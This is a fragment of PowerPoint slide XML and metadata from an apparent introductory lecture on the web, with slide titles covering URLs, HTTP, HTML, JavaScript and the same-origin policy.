            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Internet describes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> data is transported between servers and browsers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We will study the Internet later in the networking unit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113063" y="309745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2" name="Google Shape;152;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113063" y="3769675"/>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8" name="Google Shape;158;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113063" y="444190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9" name="Google Shape;159;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6504738" y="3433563"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Google Shape;153;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6504738" y="4105788"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="157" idx="3"/>
            <a:endCxn id="159" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2221263" y="3364150"/>
            <a:ext cx="4283400" cy="336000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="158" idx="3"/>
            <a:endCxn id="153" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="2221263" y="4372600"/>
            <a:ext cx="4283400" cy="336000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2221425" y="4627625"/>
            <a:ext cx="428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 Internet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URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: How do we uniquely identify a piece of data on the web?</a:t>
            </a:r>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69" name="Google Shape;16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3629</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>481</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Courier New</vt:lpstr>
      <vt:lpstr>Georgia</vt:lpstr>
      <vt:lpstr>Nunito</vt:lpstr>
      <vt:lpstr>CS 161</vt:lpstr>
      <vt:lpstr>Announcement  </vt:lpstr>
      <vt:lpstr>Introduction to Web</vt:lpstr>
      <vt:lpstr>Today: Introduction to Web</vt:lpstr>
      <vt:lpstr>A Brief History of the Web</vt:lpstr>
      <vt:lpstr>A Brief History of the Web</vt:lpstr>
      <vt:lpstr>Web 1.0</vt:lpstr>
      <vt:lpstr>What’s the Web?</vt:lpstr>
      <vt:lpstr>What’s the Web?</vt:lpstr>
      <vt:lpstr>Today: Elements of the Web</vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>Today: Elements of the Web</vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>Parts of a URL: Scheme</vt:lpstr>
      <vt:lpstr>Parts of a URL: Domain</vt:lpstr>
      <vt:lpstr>Parts of a URL: Location</vt:lpstr>
      <vt:lpstr>Parts of a URL: Path</vt:lpstr>
      <vt:lpstr>Parts of a URL: Query</vt:lpstr>
      <vt:lpstr>Parts of a URL: Fragment</vt:lpstr>
      <vt:lpstr>URL Escaping</vt:lpstr>
      <vt:lpstr>A Simplified View of the Web</vt:lpstr>
      <vt:lpstr>A Simplified View of the Web</vt:lpstr>
      <vt:lpstr>A Simplified View of the Web</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>Today: Elements of the Web</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>Parts of an HTTP Request</vt:lpstr>
      <vt:lpstr>Parts of an HTTP Response</vt:lpstr>
      <vt:lpstr>Parts of a Webpage</vt:lpstr>
      <vt:lpstr>Today: Elements of the Web</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>CSS</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>JavaScript Fact Sheet</vt:lpstr>
      <vt:lpstr>Vulnerabilities in the JavaScript interpreter/compiler</vt:lpstr>
      <vt:lpstr>Features of JavaScript</vt:lpstr>
      <vt:lpstr>Features of JavaScript</vt:lpstr>
      <vt:lpstr>Features of JavaScript</vt:lpstr>
      <vt:lpstr>Rendering a Webpage</vt:lpstr>
      <vt:lpstr>Security on the Web</vt:lpstr>
      <vt:lpstr>Risks on the Web</vt:lpstr>
      <vt:lpstr>Risks on the Web</vt:lpstr>
      <vt:lpstr>Risks on the Web</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Same-Origin Policy: Definition</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>URLs: Summary</vt:lpstr>
      <vt:lpstr>HTTP: Summary</vt:lpstr>
      <vt:lpstr>Parts of a Webpage: Summary</vt:lpstr>
      <vt:lpstr>Same-Origin Policy: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cp:lastModifiedBy>Jian Xiang</cp:lastModifiedBy>
  <cp:revision>27</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T02:10:46Z</dcterms:modified>
</cp:coreProperties>
</file>